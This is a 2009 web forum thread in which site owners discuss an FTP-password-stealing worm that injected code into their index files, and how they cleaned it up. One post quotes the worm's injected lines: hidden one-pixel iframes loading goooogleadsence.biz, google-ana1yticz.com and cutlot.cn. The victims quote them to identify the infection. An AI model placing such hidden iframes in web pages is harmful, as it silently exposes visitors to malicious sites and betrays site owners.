NetBuilders

You are welcome to look around. You will have to register before you can post a message, create a blog, chat live with our members, or add a site to our directory.



Reply Win a Steam Game
Old 8 April, 2009, 21:34 PM   #631 (permalink)
Super Moderator
 
Hellas's Avatar
 
Location: Bosnia
Thanked 232 Times in 166 Posts
Posts: 1,166
$NetBucks: 765
Join Date: Dec 2008
Last Online: Yesterday 10:27 AM
Send a message via Skype™ to Hellas
Default

Quote:
Originally Posted by DomainMagnate View Post
Hellas, what does the worm do?
First your pc get infected. Then it watchs for your username and pass for ftp (i believe when you initiate connection then it get it, not by type in).
Then it add few lines to every file on server that contain in name index, main
but I found it in some unrelated files. That files are pointed to some chinese or another sites ads or something not sure.

Here is the lines it add:

echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://google-ana1yticz.com/?click=38951B\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

and another one
<iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>

I have one big site with over 600 index files, and I am still finding the way for removing them all. Wordpress sites are very easy to clean, but I noticed it infect few other site not just index. Some guys on joomla are selling removal tools. My Clam antivirus detects all on server but it can not repair files, just delete them, so you need to manualy remove those.

And it looks like permissions did not stop him. Every file that I (my ftp user) had right to write, are infected.

Bad thing is if you dont react google wil designate your site as "This site can harm your computer". You can imagine what that would do to your site traffic.
  Reply With Quote
Old 8 April, 2009, 22:30 PM   #632 (permalink)
Moderator
 
ChillingBreeze's Avatar
 
Location: SEO-Peace.com.. 18 and half hours of the day :p
Blog Entries: 2
Thanked 141 Times in 91 Posts
Posts: 438
$NetBucks: 2,189
Join Date: Mar 2009
Last Online: Today 16:26 PM
Send a message via MSN to ChillingBreeze Send a message via Yahoo to ChillingBreeze Send a message via Skype™ to ChillingBreeze
Default

I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..

Quote:
Originally Posted by Hellas View Post
today 5 of my sites got infected by iframe ftp worm
and among them sulumits retsambew
I changed all my passwords and cleaned almost all...
lost over 7 hours to fix them all...

I see Sunitas entry is still infected. This worm is madness. I would strangle the guy who made it even if know that I am the guilty the most for not be more carefull.
I was lucky to notice almost imediatly that something is wrong...

Afzal it was some other directories I will check it when I log back to windows.
But I think it were regular directories...
  Reply With Quote
Old 8 April, 2009, 23:25 PM   #633 (permalink)
Super-Duper Moderator
 
DomainMagnate's Avatar
 
Blog Entries: 2
Thanked 118 Times in 84 Posts
Posts: 646
$NetBucks: 544
Join Date: Dec 2008
Last Online: 2 July, 2010 12:07 PM
Send a message via AIM to DomainMagnate
Default

ouch! Well I usually just roll back the previous backup when the sites get hacked.
__________________
Domain Magnate
Get yourself a cool Net Builders Blog like this
  Reply With Quote
Old 9 April, 2009, 07:01 AM   #634 (permalink)
Super Moderator
 
Hellas's Avatar
 
Location: Bosnia
Thanked 232 Times in 166 Posts
Posts: 1,166
$NetBucks: 765
Join Date: Dec 2008
Last Online: Yesterday 10:27 AM
Send a message via Skype™ to Hellas
Default

Quote:
Originally Posted by ChillingBreeze View Post
I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..
You need to clean your pc first then change all passwords then bring back your backups.
There is no point to recover if you did not change backup it will just infect everything again.


Quote:
Originally Posted by DomainMagnate View Post
ouch! Well I usually just roll back the previous backup when the sites get hacked.
That is what I did in small cases.




Also strange thing is that I dont use FTP so often. But I use FTP layers in my PHP applications... So thats why I am worried that it can watch for everything typed in.
So I changed all my system passwords.

And as I said I was lucky to notice almost immediaty. My friend contacted me and said he is getting unusual warnings and just little bit earlier everything worked.

I now work from my Mandriva installation, dont trust the XP + NOD 32. However NOD 32 noticed me and I mistakenly clicked close instead of terminate.

Also this thing works only on some browsers

IE FIREFOX and OPERA it looks it cant infect Chrome.
  Reply With Quote
Old 9 April, 2009, 15:30 PM   #635 (permalink)
nux nux is online now
Moderator
 
Location: Minneapolis
Thanked 64 Times in 44 Posts
Posts: 453
$NetBucks: 615
Join Date: Dec 2008
Last Online: Today 16:41 PM
Default

You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)
__________________
Submit your proxies: Proxy Sites
Bored? Play some parking games
  Reply With Quote
Old 9 April, 2009, 16:14 PM   #636 (permalink)
Net Builder
 
Shawn's Avatar
 
Location: Medford Oregon
Thanked 25 Times in 22 Posts
Posts: 167
Recent Blog: Gold up 67 percent
$NetBucks: 86
Join Date: Dec 2008
Last Online: 10 May, 2010 21:39 PM
Default

What browser did you use to open the infected site and what anti-virus are you running?
  Reply With Quote
Old 9 April, 2009, 17:06 PM   #637 (permalink)
Net Builder
 
Lalucochin's Avatar
 
Blog Entries: 1
Thanked 28 Times in 27 Posts
Posts: 379
$NetBucks: 43
Join Date: Mar 2009
Last Online: 21 July, 2010 10:46 AM
Default

My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.
  Reply With Quote
Old 9 April, 2009, 23:24 PM   #638 (permalink)
Net Builder Legend
 
Coastercraze's Avatar
 
Location: Under powerlines
Blog Entries: 3
Thanked 59 Times in 48 Posts
Posts: 491
$NetBucks: 186
Join Date: Jan 2009
Last Online: 25 June, 2010 01:31 AM
Send a message via AIM to Coastercraze Send a message via MSN to Coastercraze
Default

Quote:
Originally Posted by sulumits competitior View Post
My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.
Mr. Sulumits Retsambew has made it's way to the first page finally.
  Reply With Quote
Old 10 April, 2009, 06:26 AM   #639 (permalink)
Super Moderator
 
Hellas's Avatar
 
Location: Bosnia
Thanked 232 Times in 166 Posts
Posts: 1,166
$NetBucks: 765
Join Date: Dec 2008
Last Online: Yesterday 10:27 AM
Send a message via Skype™ to Hellas
Default

Quote:
Originally Posted by nux View Post
You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)
I used clam antivirus to locate all instances then manuly removed them...
  Reply With Quote
Old 10 April, 2009, 06:37 AM   #640 (permalink)
Super Moderator
 
Hellas's Avatar
 
Location: Bosnia
Thanked 232 Times in 166 Posts
Posts: 1,166
$NetBucks: 765
Join Date: Dec 2008
Last Online: Yesterday 10:27 AM
Send a message via Skype™ to Hellas
Default

here is my article about this pest
hope it will get some traffic

iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumits Retsambew
  Reply With Quote
Reply

Bookmarks

Tags
builders, contest, net, seo

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Net Builders Ads -- Now in Beta! Will.Spencer Announcements and Suggestions 54 22 August, 2009 14:36 PM
[Free] Nintendo Forums Posting Contest - Cash Money 1 Month Contest Sundance Contests 4 1 July, 2009 17:37 PM
Net Builders Directory Will.Spencer Announcements and Suggestions 19 14 March, 2009 07:00 AM
[WTB] $25 Logo Contest - Entries by Private Message Only - Contest Ends Feb 27th @ 5 PM GMT newgenservices Contests 7 28 February, 2009 16:23 PM


All times are GMT. The time now is 17:08 PM.
Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.5.1
vBAdvertise v1.0.0 Copyright ©2009, PixelFX Studios
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios